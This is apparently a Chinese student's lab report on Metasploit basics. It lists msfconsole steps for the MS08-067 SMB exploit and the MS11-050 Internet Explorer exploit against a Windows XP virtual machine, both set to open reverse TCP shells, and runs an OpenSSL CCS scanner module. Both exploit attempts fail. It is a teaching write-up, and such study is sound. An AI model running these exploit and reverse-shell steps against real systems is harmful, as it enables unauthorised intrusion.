20145338《网络对抗》 MSF基础应用
实验内容
·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路。
具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击;(3)一个针对客户端的攻击;(4)成功应用任何一个辅助模块。
基础问题回答
·exploit:通过漏洞对程序攻击的途径,是一种手段或通道。
·payload:具体的攻击代码
·encode:伪装、隐藏 达到免杀目的。
实践过程
MS08_067安全漏洞渗透攻击实践
实验前先查看kali与靶机是否可以ping通
靶机为我这次新拷的WinXPenSP3
(将Kali与靶机网络调制NAT模式,否则ping不通啊)
1 ·输入msfconsole进入msf
2 ·进入该漏洞模块的使用(use exploit/windows/smb/ms08_067_netapi)
3 ·输入命令show payload会显示出有效的攻击载荷,
4 ·show targets会显示出可以被攻击的靶机的操作系统型号
5 ·设置攻击有效载荷(set payload generic/shell_reverse_tcp)
6 ·输入show options显示我们需要在攻击前需要设置的数据,将靶机IP(RHOST)与kali IP(LHOST)进行设置
7 ·输入exploit开始攻击
攻击失败。。。。未完待续。。
呀 ping都没ping通 不失败才怪哦 。。。
继续。。。
IE浏览器渗透攻击——MS11050安全漏洞
·在kali终端开启msfconsole,利用search命令搜索。
输入命令use exploit/windows/browser/ms11_050_mshtml_cobjetelement,进入该漏洞模块。使用info命令查看模块信息 。
设置对应的载荷set payload windows/meterpreter/reverese_tcp;show options查看需要设置的相关信息:
查看配置渗透攻击所需的配置选项
配置相关信息:set LHOST; ‘kali Ip’;; set LPORT 5338; set URIPATH ,
启动exploit 生成攻击
攻击失败.
Adobe阅读器渗透攻击
辅助模块
我选择auxiliary/scanner/ssl/openssl_ccs.rb
·在auxiliary中选择scanner中的ssl其中一个模块ccs.rb
·通过info查看需要配置的东西
·开始扫描
实验体会
比起做不出实验更让人难受的是电脑卡的要死 有时候lali还罢工 直接就打不开了,状况百出。大家看到的是什么时候交的博客 并不知道在底下配置电脑花了多久。。
不过也还好 已经完成一个。